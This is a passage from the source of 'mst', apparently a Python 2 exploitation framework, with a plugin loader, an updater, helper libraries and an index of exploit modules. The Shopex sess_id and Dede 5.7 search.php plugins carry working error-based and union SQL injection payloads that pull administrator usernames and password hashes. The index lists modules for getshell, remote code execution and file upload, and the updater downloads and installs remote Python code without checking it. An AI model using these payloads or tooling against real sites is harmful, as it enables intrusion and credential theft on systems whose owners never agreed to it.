32 | color.cprint("[!] Exploit False :( [%s]"%check,RED)
33 | except Exception,e:
34 | color.cprint("[!] ERR:%s"%e,RED)
35 |
--------------------------------------------------------------------------------
/plugins/exploit/Shopex_sess_id_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | '''Shopex sqlinject'''
4 | infos = [
5 | ['Plugin','Shopex sessid SqlInject Exp'],
6 | ['Author','teamtopkarl'],
7 | ['Update','2013/10/24'],
8 | ['site','http://www.21hn.net']
9 | ]
10 | opts = [
11 | ['URL','www.xxxxxxx.com','Url'],
12 | ['PATH','/shopadmin/','Cms path'],
13 | ['PORT','80','port']
14 | ]
15 | def exploit(self):
16 | '''start exploit'''
17 | url = fuck.urlformate(URL,PORT,PATH)
18 | exp = url+"index.php?ctl=passport&act=login&sess_id=1'+and(select+1+from(select+count(*),concat((select+(select+(select+concat(userpass,0x7e,username,0x7e,op_id)+from+sdb_operators+Order+by+username+limit+0,1)+)+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+'1'='1"
19 | color.cprint("[*] Sending exp..",YELLOW)
20 | ok = fuck.urlget(exp)
21 | if ok.getcode() == 200:
22 | tmp=fuck.find(r"Duplicate entry \'\w+'",ok.read())
23 | if len(tmp)>0:
24 | color.cprint("[*] Exploit Successful !",GREEN)
25 | i=1
26 | for res in tmp:
27 | res=res[1:len(res)-1]
28 | color.cprint("[%s] %s"%(i,res),GREEN)
29 | fuck.writelog("shopex_sess_id_sqli",URL+"::"+res)
30 | i+=1
31 | else:
32 | color.cprint("[!] TARGET NO VULNERABLE !",RED)
33 | else:
34 | color.cprint("[!] EXPLOIT FALSE ! CODE:%s"%ok.getcode(),RED)
35 |
--------------------------------------------------------------------------------
/cache/exploit.txt:
--------------------------------------------------------------------------------
1 | exploit|08cms_pays.php_SQLInject|exploit/08cms_pays.php_SQLInject
2 | exploit|B2BBuilder_comment.php_SQLInject|exploit/B2BBuilder_comment.php_SQLInject
3 | exploit|dede5.7_download.php_getshell|exploit/dede5.7_download.php_getshell
4 | exploit|dede5.7_search.php_SQLInject|exploit/dede5.7_search.php_SQLInject
5 | exploit|easethink_payment.php_SQLInject|exploit/easethink_payment.php_SQLInject
6 | exploit|Ecshop_2.7_user.php_SQLInject|exploit/Ecshop_2.7_user.php_SQLInject
7 | exploit|espcms_search_SQLInject|exploit/espcms_search_SQLInject
8 | exploit|FS_SetNextOptions.asp_Inject|exploit/FS_SetNextOptions.asp_Inject
9 | exploit|ms12_020|exploit/ms12_020
10 | exploit|phpweb_SQLInject|exploit/phpweb_SQLInject
11 | exploit|Qianbo_HitCount_SQLInject|exploit/Qianbo_HitCount_SQLInject
12 | exploit|Qibo_cms_s_rpc.php_SQLInject|exploit/Qibo_cms_s_rpc.php_SQLInject
13 | exploit|Shop7z_v1.4_Sqlinject|exploit/Shop7z_v1.4_Sqlinject
14 | exploit|shopex_4.8.5_api.php_SQLInject|exploit/shopex_4.8.5_api.php_SQLInject
15 | exploit|shopex_back_end_SQLInject|exploit/shopex_back_end_SQLInject
16 | exploit|Shopex_sess_id_SQLInject|exploit/Shopex_sess_id_SQLInject
17 | exploit|southidc_NewsType.asp_SQLInject|exploit/southidc_NewsType.asp_SQLInject
18 | exploit|southidc_News_search.asp_SQLInject|exploit/southidc_News_search.asp_SQLInject
19 | exploit|Tipask_2.0_SQLInject|exploit/Tipask_2.0_SQLInject
20 | exploit|WordPress_Area53_theme_Arbitrary_File_Upload|exploit/WordPress_Area53_theme_Arbitrary_File_Upload
21 | exploit|xuas_news_more.asp_SQLInject|exploit/xuas_news_more.asp_SQLInject
22 | exploit|ZonPHP_2.25_Remote_Code_Exec|exploit/ZonPHP_2.25_Remote_Code_Exec
23 | exploit|Zuitu_Call.php_SQLInject|exploit/Zuitu_Call.php_SQLInject
24 |
--------------------------------------------------------------------------------
/libs/MstLoad.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>class=>load::load plugin
3 | Mst=>class=>plug::plugin class
4 | '''
5 | from MstColor import *
6 | from MstPlugin import *
7 | from os import system
8 |
9 | class load:
10 | '''load mst plugin'''
11 | def start(self,plutype,pluname):
12 | try:
13 | mm=m("plugins/%s.py"%pluname)
14 | while 1:
15 | mm.printp(plutype,pluname)
16 | pcmd=raw_input(">")
17 | if pcmd == 'back' or pcmd == 'exit':
18 | break
19 | elif pcmd == 'help':
20 | mm.pluhelp()
21 | elif pcmd == 'cls':
22 | mm.cls()
23 | elif pcmd == 'info':
24 | mm.info()
25 | elif pcmd == 'opts':
26 | mm.opt()
27 | elif pcmd == 'exploit':
28 | mm.exploit()
29 | elif pcmd == 'load':
30 | mm.load()
31 | elif pcmd == 'set':
32 | color.cprint("[?] USAGE:set ",YELLOW)
33 | elif len(pcmd.split(" "))==2:
34 | ptmp=pcmd.split(" ")
35 | if ptmp[0] == "load":
36 | if len(ptmp[0])>0 and len(ptmp[1])>0:
37 | execfile("plugins/load/%s.py"%ptmp[1])
38 | elif len(pcmd)>0:
39 | system(pcmd)
40 | elif len(pcmd.split(" "))==3:
41 | ptmp=pcmd.split(" ")
42 | if ptmp[0] == "set":
43 | if len(ptmp[1])>0 and len(ptmp[2])>0:
44 | mm.setp(ptmp[1],ptmp[2])
45 | elif len(pcmd)>0:
46 | system(pcmd)
47 | elif len(pcmd)>0:
48 | system(pcmd)
49 | except KeyboardInterrupt:
50 | color.cprint("\n[!] CTRL+C EXIT !",RED)
51 | except Exception,e:
52 | color.cprint("[!] ERR:%s"%e,RED)
53 |
54 |
55 | if __name__ == '__main__':
56 | print __doc__
57 | else:
58 | load=load()
59 |
--------------------------------------------------------------------------------
/libs/MstColor.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>libs=>color
3 | '''
4 | from os import name
5 | if name == 'nt':
6 | '''windows color table'''
7 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY
8 | BLACK = 0x0
9 | BLUE = 0x01
10 | GREEN = 0x02
11 | CYAN = 0x03
12 | RED = 0x04
13 | PURPLE= 0x05
14 | YELLOW= 0x06
15 | WHITE = 0x07
16 | GREY = 0x08
17 | else:
18 | '''other os color table'''
19 | #global BLACK,BLUE,GREEN,CYAN,RED,PURPLE,YELLOW,WHITE,GREY
20 | BLACK = '\033[0m'
21 | BLUE = '\033[34m'
22 | GREEN = '\033[32m'
23 | CYAN = '\033[36m'
24 | RED = '\033[31m'
25 | PURPLE= '\033[35m'
26 | YELLOW= '\033[33m'
27 | WHITE = '\033[37m'
28 | GREY = '\033[38m'
29 | wincode = """
30 | class ntcolor:
31 | '''windows cmd color'''
32 | try:
33 | STD_INPUT_HANDLE = -10
34 | STD_OUTPUT_HANDLE= -11
35 | STD_ERROR_HANDLE = -12
36 | import ctypes
37 | std_out_handle = ctypes.windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
38 | def set_cmd_text_color(self,color, handle=std_out_handle):
39 | '''set color'''
40 | bool = self.ctypes.windll.kernel32.SetConsoleTextAttribute(handle, color)
41 | return bool
42 | def resetColor(self):
43 | '''reset color'''
44 | self.set_cmd_text_color(RED|GREEN|BLUE)
45 | def cprint(self,msg,color=BLACK,enter=1):
46 | '''print color message'''
47 | self.set_cmd_text_color(color|color|color)
48 | if enter == 1:
49 | print msg
50 | else:
51 | print msg,
52 | self.resetColor()
53 | except:
54 | pass
55 | """
56 | otcode = """
57 | class otcolor:
58 | '''other os terminal color'''
59 | def cprint(self,msg,color=BLACK,enter=1):
60 | '''print color message'''
61 | if enter == 1:
62 | print color+msg+BLACK
63 | else:
64 | print color+msg+BLACK,
65 | """
66 | if __name__ == '__main__':
67 | print __doc__
68 | else:
69 | if name == 'nt':
70 | exec(wincode)
71 | color = ntcolor()
72 | else:
73 | exec(otcode)
74 | color = otcolor()
75 |
--------------------------------------------------------------------------------
/libs/MstUpdate.py:
--------------------------------------------------------------------------------
1 | '''
2 | MST::update
3 | VER::20131102
4 | '''
5 | from urllib import urlopen
6 | from os import path
7 | from MstColor import *
8 | from MstExploit import ver
9 | from base64 import decodestring as de
10 |
11 | url = "http://mstoor.duapp.com/update/"
12 |
13 | class update:
14 | '''update mst plugins&functions'''
15 | def download(self):
16 | try:
17 | #download exploit functions..
18 | color.cprint("[*] update MstExploit.py..",YELLOW)
19 | tmp = urlopen(url+"?do=ver").read()
20 | tmp = tmp.replace("\n","")
21 | if int(ver)>int(tmp):
22 | tmp = urlopen(url+"?do=url").read()
23 | tmp = tmp.replace("\n","")
24 | res = urlopen(tmp).read()
25 | res = res.replace("\r","")
26 | fpp = open("libs/MstExploit.py","w")
27 | fpp.write(res)
28 | fpp.close()
29 | color.cprint("[*] Done ! ",CYAN)
30 | #download plugins
31 | color.cprint("[*] update Plugins..",YELLOW)
32 | tmp = urlopen(url+"?do=vip").readlines()
33 | for t in tmp:
34 | t = t.replace("\n","")
35 | t = t.replace("\r","")
36 | if len(t)>0:
37 | tmp = t.split("{|MST|}")
38 | upu = tmp[0]
39 | upn = de(tmp[1])
40 | upt = de(tmp[2])
41 | if upn[len(upn)-3:].upper() != ".PY":
42 | upn = upn+".py"
43 | uuu = "plugins/%s/%s"%(upt,upn)
44 | if not path.exists(uuu):
45 | color.cprint("[-] download %s "%upn,GREEN,0)
46 | tmp = urlopen(upu).read()
47 | tmp = tmp.replace("\r","")
48 | fpp = open(uuu,"w")
49 | fpp.write(tmp)
50 | fpp.close()
51 | color.cprint("Done :)",YELLOW)
52 | color.cprint("[*] All Update Done :)",CYAN)
53 | except Exception,e:
54 | print e
55 |
56 | if __name__ == '__main__':
57 | print __doc__
58 | else:
59 | update=update()
60 |
--------------------------------------------------------------------------------
/plugins/multi/what_cms.py:
--------------------------------------------------------------------------------
1 |
2 | class mstplugin:
3 | infos=[
4 | ['Name','What_Cms'],
5 | ['Description','Match the cms type'],
6 | ['Author','L34Rn'],
7 | ['Mail','cnh4ckff@gmail.com'],
8 | ['Blog','http://hi.baidu.com/l34rn'],
9 | ['DATE','20131023'],
10 | ['IMPORT','[dicts/what_cms/] => [Web_dir::Hash::cms]']
11 | ]
12 |
13 | opts=[
14 | ['HOST','www.cms.com','The host need to match'],
15 | ['PORT','80','The port of the webserver'],
16 | ['PATH','/','The path of the cms who need to match']
17 | ]
18 |
19 |
20 | def exploit(self):
21 | host=self.host_reduce_http(HOST)
22 | port=PORT
23 | path=PATH
24 | color.cprint('[+] what_cms start OK!',BLUE)
25 | color.cprint('[+] [TARGET] '+host,BLUE)
26 | if str(host)=='443':
27 | _host='http://'+host+path
28 | else:
29 | _host='http://'+host+':'+port+path
30 | try:
31 | cms=self.what_cms(_host)
32 | if cms=='Falied':
33 | color.cprint('\n[!] All Done!\n[!] But Falied!',RED)
34 | else:
35 | color.cprint('\n[+] Good News!\n[+] '+cms,GREEN)
36 | except Exception,e:
37 | color.cprint('\n[!] Error=>'+str(e),RED)
38 |
39 | def host_reduce_http(self,host):
40 | l=len(host.split('//'))
41 | if l==1:
42 | host=host.strip()
43 | host=host.split('/')[0]
44 | elif l==2:
45 | host=host.split('//')[1]
46 | host=host.split('/')[0]
47 | else:
48 | host='Error!'
49 | return host
50 |
51 | def what_cms(sself,host):
52 |
53 | def get_md5(html):
54 | m=hashlib.md5()
55 | m.update(html)
56 | md5=m.hexdigest()
57 | return md5
58 |
59 | def get_html(url):
60 | url=url.strip()
61 | html=urllib.urlopen(url).read()
62 | return html
63 |
64 | cms_list=listdir('dicts/what_cms/')
65 |
66 | for cms in cms_list:
67 | f=open('dicts/what_cms/'+cms,'r')
68 | lines=f.readlines()
69 | f.close()
70 | for line in lines:
71 | l=line.split('::')
72 | web_dir=l[0]
73 | hash=l[1]
74 | cms_version=l[2]
75 | url=host+web_dir
76 | sys.stdout.write('\r[*] [TRYING] %s'% web_dir.strip())
77 | try:
78 | _html=get_html(url)
79 | _md5=get_md5(_html)
80 | if _md5==hash:
81 | result=url+' => '+cms_version
82 | return result
83 | break
84 | except Exception,e:
85 | color.cprint('[!] Error=>'+str(e),RED)
86 | pass
87 | return 'Falied'
88 |
--------------------------------------------------------------------------------
/mst.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python2.7
2 | #coding:utf-8
3 | ################################
4 | # mst::My Sec Tools #
5 | # ver::2.0Beta #
6 | # mkt::2013-11-03 #
7 | # url::http://mstoor.duapp.com #
8 | ################################
9 | from libs.MstUpdate import update
10 | from libs.MstCache import cache
11 |
12 | if __name__ == "__main__":
13 | try:
14 | cache.start()
15 | while True:
16 | cache.printmst()
17 | cmd = raw_input('>')
18 | if cmd == 'help':
19 | cache.mainhelp()
20 | elif cmd == 'exit':
21 | cache.mainexit()
22 | elif cmd == 'cls':
23 | cache.cls()
24 | elif cmd == 'use':
25 | cache.usage("use")
26 | elif cmd == 'show':
27 | cache.usage("show")
28 | elif cmd == 'search':
29 | cache.usage("search")
30 | elif cmd == 'banner':
31 | cache.banner()
32 | elif cmd == 'update':
33 | update.download()
34 | cache.start()
35 | elif len(cmd.split(" ")) == 2:
36 | n = cmd.split(" ")
37 | c = n[0]
38 | g = n[1]
39 | if c == 'search':
40 | if len(g.replace(" ",""))>0:
41 | cache.search(g)
42 | else:
43 | cache.usage(c)
44 | elif c == 'show':
45 | if g == 'exploit':
46 | cache.showplus("exploit")
47 | elif g == 'payload':
48 | cache.showplus("payload")
49 | elif g == 'multi':
50 | cache.showplus("multi")
51 | else:
52 | cache.usage(c)
53 | elif c == 'use':
54 | if len(g.replace(" ",""))>0:
55 | cache.load(g)
56 | else:
57 | cache.usage(c)
58 | elif len(cmd.replace(" ",""))>0:
59 | cache.execmd(cmd)
60 | elif len(cmd.replace(" ",""))>0:
61 | cache.execmd(cmd)
62 | except KeyboardInterrupt:
63 | cache.mainexit()
64 | except Exception,e:
65 | cache.errmsg(e)
66 |
--------------------------------------------------------------------------------
/plugins/exploit/dede5.7_search.php_SQLInject.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | class mstplugin:
3 | '''shopex_4.8.5_sqlInject'''
4 | infos = [
5 | ['Plugin','dede5.7_search.php_SQLInject'],
6 | ['Author','xfkxfk'],
7 | ['Update','2013/10/25'],
8 | ['Site','http://www.hackcto.com'],
9 | ]
10 | opts = [
11 | ['URL','localhost','Target URL'],
12 | ['PATH','/','CMS Path'],
13 | ['PORT','80','Target Port']
14 | ]
15 | def exploit(self):
16 | url = fuck.urlformate(URL,PORT,PATH)
17 | poc1 = '/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a'
18 | poc2 = '/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a'
19 | url1 = url + poc1
20 | url2 = url + poc2
21 | color.cprint("[+] Sending exp ..",YELLOW)
22 | try:
23 | res1 = fuck.urlget(url1).read()
24 | username = fuck.find(r'(\w+)
',res1)
25 | password = fuck.find(r'(\w{20}\.{3})
',res1)
26 | if len(username) != 0 and len(password) != 0:
27 | username = username[0]
28 | password = password[0][3:-4]
29 | color.cprint("[*] Exploit Successful !",GREEN)
30 | color.cprint("[*] %s : %s"%(username, password),GREEN)
31 | fuck.writelog("dede5.7_search_php_sqli",URL+"::"+username+"::"+password)
32 | else:
33 | res2 = fuck.urlget(url).read()
34 | username = fuck.find(r'(\w+)
',res2)
35 | password = fuck.find(r'(\w{20}\.{3})
',res2)
36 | if len(username) != 0 and len(password) != 0:
37 | username = username[0]
38 | password = password[0][3:-4]
39 | color.cprint("[*] Exploit Successful !",GREEN)
40 | color.cprint("[*] %s : %s"%(username, password),GREEN)
41 | fuck.writelog("dede5.7_search_php_sqli",URL+"::"+username+"::"+password)
42 | except Exception,e:
43 | color.cprint("[!] Exploit False ! CODE:%s"%e,RED)
44 |
--------------------------------------------------------------------------------
/libs/MultipartPostHandler.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | ####
4 | # 02/2006 Will Holcomb
5 | #
6 | # This library is free software; you can redistribute it and/or
7 | # modify it under the terms of the GNU Lesser General Public
8 | # License as published by the Free Software Foundation; either
9 | # version 2.1 of the License, or (at your option) any later version.
10 | #
11 | # This library is distributed in the hope that it will be useful,
12 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
14 | # Lesser General Public License for more details.
15 | #
16 | """
17 | Usage:
18 | Enables the use of multipart/form-data for posting forms
19 |
20 | Inspirations:
21 | Upload files in python:
22 | http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/146306
23 | urllib2_file:
24 | Fabien Seisen:
25 |
26 | Example:
27 | import MultipartPostHandler, urllib2, cookielib
28 |
29 | cookies = cookielib.CookieJar()
30 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
31 | MultipartPostHandler.MultipartPostHandler)
32 | params = { "username" : "bob", "password" : "riviera",
33 | "file" : open("filename", "rb") }
34 | opener.open("http://wwww.bobsite.com/upload/", params)
35 |
36 | Further Example:
37 | The main function of this file is a sample which downloads a page and
38 | then uploads it to the W3C validator.
39 | """
40 |
41 | import urllib
42 | import urllib2
43 | import mimetools, mimetypes
44 | import os
45 |
46 | class Callable:
47 | def __init__(self, anycallable):
48 | self.__call__ = anycallable
49 |
50 | # Controls how sequences are uncoded. If true, elements may be given multiple values by
51 | # assigning a sequence.
52 | doseq = 1
53 |
54 | class MultipartPostHandler(urllib2.BaseHandler):
55 | handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first
56 |
57 | def http_request(self, request):
58 | data = request.get_data()
59 | if data is not None and type(data) != str:
60 | v_files = []
61 | v_vars = []
62 | try:
63 | for key, value in data.items():
64 | if type(value) == file:
65 | v_files.append((key, value))
66 | else:
67 | v_vars.append((key, value))
68 | except TypeError:
69 | systype, value, traceback = sys.exc_info()
70 | raise TypeError, "not a valid non-string sequence or mapping object", traceback
71 |
72 | if len(v_files) == 0:
73 | data = urllib.urlencode(v_vars, doseq)
74 | else:
75 | boundary, data = self.multipart_encode(v_vars, v_files)
76 | contenttype = 'multipart/form-data; boundary=%s' % boundary
77 | if request.has_header('Content-Type') \
78 | and request.get_header('Content-Type').find('multipart/form-data') != 0:
79 | print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
80 | request.add_unredirected_header('Content-Type', contenttype)
81 |
82 | request.add_data(data)
83 | return request
84 |
85 | def multipart_encode(vars, files, boundary = None, buffer = None):
86 | if boundary is None:
87 | boundary = mimetools.choose_boundary()
88 | if buffer is None:
89 | buffer = ''
90 | for key, value in vars:
91 | buffer += '--%s\r\n' % boundary
92 | buffer += 'Content-Disposition: form-data; name="%s"' % key
93 | buffer += '\r\n\r\n' + value + '\r\n'
94 | for key, fd in files:
95 | file_size = os.fstat(fd.fileno()).st_size
96 | filename = os.path.basename(fd.name)
97 | contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
98 | buffer += '--%s\r\n' % boundary
99 | buffer += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
100 | buffer += 'Content-Type: %s\r\n' % contenttype
101 | # buffer += 'Content-Length: %s\r\n' % file_size
102 | fd.seek(0)
103 | buffer += '\r\n' + fd.read() + '\r\n'
104 | buffer += '--%s--\r\n\r\n' % boundary
105 | return boundary, buffer
106 | multipart_encode = Callable(multipart_encode)
107 |
108 | https_request = http_request
109 |
110 | def main():
111 | import tempfile, sys
112 |
113 | validatorURL = "http://validator.w3.org/check"
114 | opener = urllib2.build_opener(MultipartPostHandler)
115 |
116 | def validateFile(url):
117 | temp = tempfile.mkstemp(suffix=".html")
118 | os.write(temp[0], opener.open(url).read())
119 | params = { "ss" : "0", # show source
120 | "doctype" : "Inline",
121 | "uploaded_file" : open(temp[1], "rb") }
122 | print opener.open(validatorURL, params).read()
123 | os.remove(temp[1])
124 |
125 | if len(sys.argv[1:]) > 0:
126 | for arg in sys.argv[1:]:
127 | validateFile(arg)
128 | else:
129 | validateFile("http://www.google.com")
130 |
131 | if __name__=="__main__":
132 | main()
133 |
--------------------------------------------------------------------------------
/libs/MstExploit.py:
--------------------------------------------------------------------------------
1 | '''
2 | ==================================
3 | MST::exploits&multis=>functions
4 | URL::http://mstoor.duapp.com
5 | ==================================
6 | '''
7 | from socket import *
8 | from MstColor import *
9 | from os import listdir,getcwd
10 | import re,sys,hashlib
11 | import threading,time,Queue
12 | import MultipartPostHandler
13 | import urllib,urllib2,cookielib
14 |
15 | ver = 20131117
16 |
17 | class fuck:
18 | '''You can use fuck.func() in your plugins(exp&mul)'''
19 | ##############################################
20 | # CHECKPORT::By:mst #
21 | ##############################################
22 | def checkport(self,host,port):
23 | '''check host's port'''
24 | try:
25 | s=socket(AF_INET,SOCK_STREAM)
26 | s.settimeout(5)
27 | s.connect((host,int(port)))
28 | s.close()
29 | return True
30 | except:
31 | return False
32 | ##############################################
33 | # GET URL:By:mst #
34 | ##############################################
35 | def urlget(self,url):
36 | '''url open=>get'''
37 | try:
38 | return urllib.urlopen(url)
39 | except:
40 | return False
41 | ##############################################
42 | # URL POST::By:mst #
43 | ##############################################
44 | def urlpost(self,url,value):
45 | '''url post'''
46 | data = urllib.urlencode(value)
47 | headers = { 'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11' }
48 | res = urllib2.Request(url,data,headers)
49 | try:
50 | ok = urllib2.urlopen(res)
51 | return ok
52 | except:
53 | return False
54 | ##############################################
55 | # UPLOAD FILE::By:mst #
56 | ##############################################
57 | def urlupload(self,url,value):
58 | '''url upload file'''
59 | try:
60 | cookies = cookielib.CookieJar()
61 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),MultipartPostHandler.MultipartPostHandler)
62 | opener.open(url, value)
63 | except:
64 | return False
65 | ##############################################
66 | # URL TO IP::By:mst #
67 | ##############################################
68 | def urltoip(self,url):
69 | '''url to ip'''
70 | try:
71 | return gethostbyname(url)
72 | except:
73 | return False
74 | ##############################################
75 | # write log::By:mst #
76 | ##############################################
77 | def writelog(self,logname,log):
78 | '''write log to file'''
79 | try:
80 | fp = open('output/%s.log'%logname,'a')
81 | fp.write(log+"\n")
82 | fp.close()
83 | except:
84 | return False
85 | ##############################################
86 | # find sth by re::By:mst #
87 | ##############################################
88 | def find(self,r,t):
89 | '''re find'''
90 | try:
91 | return re.findall(r,t)
92 | except:
93 | return False
94 | ##############################################
95 | # TOPAYLOAD::By:mst #
96 | ##############################################
97 | def topayload(self,PAYLOAD,arr):
98 | '''send args to payload'''
99 | if PAYLOAD.upper() != "FALSE" and len(PAYLOAD)>0:
100 | color.cprint("[*] Start Payload ..",YELLOW)
101 | code=open("plugins/payload/"+PAYLOAD+".py").read()
102 | exec(code)
103 | exec("global mstpayload")
104 | payload=mstpayload(arr)
105 | code=open("libs/MstPayload.py").read()
106 | exec(code)
107 | payload.start()
108 | ##############################################
109 | # FORMATE URL::By:mst #
110 | ##############################################
111 | def urlformate(self,url,port,path):
112 | '''formate url~~~...need url port and path'''
113 | if port == "443":
114 | tmp = "https://%s%s"%(url,path)
115 | elif port == "80":
116 | tmp = "http://%s%s"%(url,path)
117 | else:
118 | tmp = "http://%s:%s%s"%(url,port,path)
119 | return tmp
120 | ##############################################
121 | # THREAD FUNCTION::By:mst&L34Rn #
122 | ##############################################
123 | def thread(self,func,args,thr):
124 | '''[1] the func to run,[2] the func's args,[3] the thread nums'''
125 | q = Queue.Queue()
126 | t = []
127 | def start(q):
128 | while not q.empty():
129 | func(q.get())
130 | for a in args:
131 | q.put(a)
132 | for i in range(int(thr)):
133 | tt = threading.Thread(target=start,args=(q,))
134 | t.append(tt)
135 | for i in range(int(thr)):
136 | t[i].start()
137 | for i in range(int(thr)):
138 | t[i].join(timeout=3)
139 |
140 |
141 |
142 |
143 | if __name__ == '__main__':
144 | print __doc__
145 |
--------------------------------------------------------------------------------
/libs/MstPlugin.py:
--------------------------------------------------------------------------------
1 | '''
2 | Mst=>Plugin=>Class
3 | '''
4 | from MstColor import *
5 | from MstExploit import *
6 | from os import path,system
7 | class m:
8 | '''mst plugin's class'''
9 | def __init__(self,name):
10 | '''exec plugin code'''
11 | fp = open(name).read()
12 | exec(fp)
13 | code = '\n'
14 | for t in mstplugin.opts:
15 | o=t[0]
16 | v=t[1]
17 | code += 'global %s\n'%o
18 | code += '%s="%s"\n'%(o,v)
19 | code += "global plugin\n"
20 | code += "plugin=mstplugin()\n"
21 | exec(fp+code)
22 | def info(self):
23 | '''display plugin infos'''
24 | color.cprint("PLUGIN INFOS",YELLOW)
25 | color.cprint("============",GREY)
26 | color.cprint("PARAMETER VALUE",YELLOW)
27 | color.cprint("-"*15+" "+"-"*20,GREY)
28 | for n in plugin.infos:
29 | p=n[0]
30 | v=n[1]
31 | color.cprint("%-15s"%p,CYAN,0)
32 | color.cprint("%-s"%v,PURPLE)
33 | def opt(self):
34 | '''display plugin opts'''
35 | color.cprint("PLUGIN OPTS",YELLOW)
36 | color.cprint("===========",GREY)
37 | color.cprint("%-15s %-20s %-40s"%("PARAMETER","VALUE","DESCRIPTION"),YELLOW)
38 | color.cprint("%-15s %-20s %-40s"%("-"*15,"-"*20,"-"*40),GREY)
39 | for n in plugin.opts:
40 | p=n[0]
41 | v=n[1]
42 | d=n[2]
43 | color.cprint("%-15s"%p,CYAN,0)
44 | exec('color.cprint("%-20s"%'+"%s"%p+',PURPLE,0)')
45 | color.cprint("%-40s"%d,GREEN)
46 | '''if self.checkpayload(PAYLOAD) == "TRUE":
47 | color.cprint("PAYLOAD OPTS",YELLOW)
48 | color.cprint("============",GREY)
49 | color.cprint("%-15s %-40s"%("PARAMETER","DESCRIPTION"),YELLOW)
50 | color.cprint("%-15s %-40s"%("-"*15,"-"*40),GREY)
51 | code = open("plugins/payload/"+PAYLOAD+".py").read()
52 | exec(code)
53 | try:
54 | exec("global mstpayload")
55 | except:
56 | pass
57 | for n in mstpayload.opts:
58 | p=n[0]
59 | d=n[1]
60 | color.cprint("%-15s"%p,CYAN,0)
61 | color.cprint("%-40s"%d,PURPLE)'''
62 | def setp(self,p,v):
63 | '''set plugin par value'''
64 | p=p.upper()
65 | if p == 'PAYLOAD':
66 | if v.upper() == "FALSE":
67 | code = 'global PAYLOAD;PAYLOAD="false";'
68 | exec(code)
69 | color.cprint("[*] Disabled PAYLOAD !",YELLOW)
70 | elif self.checkpayload(v) == 'TRUE' and self.getopt("PAYLOAD") != "FALSE":
71 | color.cprint("[*] SET %s=>%s"%(p,v),YELLOW)
72 | code = 'global %s\n'%p
73 | code += '%s="%s"'%(p,v)
74 | exec(code)
75 | else:
76 | color.cprint("[!] SET PAYLOAD FALSE !",RED)
77 |
78 | else:
79 | color.cprint("[*] SET %s=>%s"%(p,v),YELLOW)
80 | code = 'global %s\n'%p
81 | code += '%s="%s"'%(p,v)
82 | exec(code)
83 | def getopt(self,opt):
84 | '''get plugin opt'''
85 | ok='FALSE'
86 | for n in plugin.opts:
87 | p=n[0]
88 | v=n[1]
89 | d=n[2]
90 | if opt == p:
91 | ok=v
92 | return ok.upper()
93 |
94 | def exploit(self):
95 | '''start exploit !!'''
96 | try:
97 | global fuck
98 | fuck=fuck()
99 | except:
100 | pass
101 | color.cprint("[*] Start exploit..",YELLOW)
102 | plugin.exploit()
103 | def checkpayload(self,payload):
104 | '''check payload exists'''
105 | ok='no'
106 | cf="plugins/payload/%s.py"%payload
107 | if payload == '' or payload.upper() == 'FALSE':
108 | ok='false'
109 | if path.exists(cf):
110 | ok='true'
111 | return ok.upper()
112 |
113 |
114 | def printp(self,pt,plu):
115 | '''plugin color input'''
116 | ptmp=plu.split("/")
117 | pplu=plu[len(ptmp[0])+1:]
118 | color.cprint("mst",GREY,0)
119 | color.cprint("%s["%pt,WHITE,0)
120 | color.cprint(pplu,RED,0)
121 | color.cprint("]",WHITE,0)
122 | def pluhelp(self):
123 | '''plugin help menu'''
124 | color.cprint('PLUGIN HELP MENU',YELLOW)
125 | color.cprint('================',GREY)
126 | color.cprint(' Command Description',YELLOW)
127 | color.cprint(' ------- -----------',GREY,0)
128 | color.cprint('''
129 | help Displays the plugin menu
130 | back Back to Mst Main
131 | cls Clear the screen
132 | info Displays the plugin info
133 | opts Displays the mst options
134 | set Configure the plugin parameters
135 | exploit Start plugin to exploit''',CYAN)
136 | color.cprint('PLUGIN SET HELP',YELLOW)
137 | color.cprint('===============',GREY)
138 | color.cprint(' Command Description',YELLOW)
139 | color.cprint(' ------- -----------',GREY,0)
140 | color.cprint('''
141 | PAYLOAD Set payload
142 | Set parameter''',CYAN)
143 | def cls(self):
144 | '''clear the screen'''
145 | if name == 'nt':
146 | system("cls")
147 | else:
148 | system("clear")
149 | def load(self):
150 | color.cprint("[?] USAGE::load ",YELLOW)
151 | if __name__ == '__main__':
152 | print __doc__
153 |
154 |
--------------------------------------------------------------------------------
/libs/MstCache.py:
--------------------------------------------------------------------------------
1 | # -*- coding: utf-8 -*-
2 | '''
3 | MstCache=>class
4 | For main's some func or other~
5 | update:2013/10/21
6 | '''
7 |
8 | from MstColor import *
9 | from os import listdir,system,path,remove
10 | from random import choice
11 | from MstLoad import load
12 | from MstExploit import ver
13 | import re
14 |
